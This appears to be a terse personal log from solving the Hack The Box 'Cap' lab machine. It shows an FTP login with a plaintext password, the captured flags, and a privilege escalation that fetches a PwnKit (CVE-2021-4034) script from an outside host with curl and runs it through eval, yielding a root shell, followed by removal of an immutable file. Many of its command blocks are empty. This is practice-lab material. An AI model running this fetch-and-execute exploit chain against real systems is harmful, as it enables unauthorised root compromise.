HTB - Cap - LINUX

COMMANDS:
=============================================================================================
220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
=============================================================================================

COMMANDS:
=============================================================================================
nathan@cap:~$ cat user.txt
01a5c1c9fcbd3a1f28ec9a18cac40f00
=============================================================================================

COMMANDS:
=============================================================================================
nathan@cap:~$ eval "$(curl -s http://10.10.14.7/cve-2021-4034.sh)"
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami
root
# ls
'GCONV_PATH=.'   cve-2021-4034     gconv-modules   pwnkit.so
 Makefile        cve-2021-4034.c   pwnkit.c        user.txt
# cd /root
# ls
root.txt  snap
# cat roo
cat: roo: No such file or directory
# cat root.txt
8f981c48c3ff29582be7a3cf39402fe5
=============================================================================================

COMMANDS:
=============================================================================================
# chmod 755 user.txt
chmod: changing permissions of 'user.txt': Operation not permitted
# chown root user.txt
chown: changing ownership of 'user.txt': Operation not permitted
# ^C
# lsattr user.txt
----i---------e----- user.txt
# sudo chattr -i user.txt
# ls
'GCONV_PATH=.'   cve-2021-4034     gconv-modules   pwnkit.so
 Makefile        cve-2021-4034.c   pwnkit.c        user.txt
# lsattr
--------------e----- ./cve-2021-4034
--------------e----- ./GCONV_PATH=.
--------------e----- ./gconv-modules
--------------e----- ./Makefile
--------------e----- ./pwnkit.c
--------------e----- ./cve-2021-4034.c
--------------e----- ./user.txt
--------------e----- ./pwnkit.so
# rm user.txt
# lsattr
--------------e----- ./cve-2021-4034
--------------e----- ./GCONV_PATH=.
--------------e----- ./gconv-modules
--------------e----- ./Makefile
--------------e----- ./pwnkit.c
--------------e----- ./cve-2021-4034.c
--------------e----- ./pwnkit.so
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

COMMANDS:
=============================================================================================
=============================================================================================

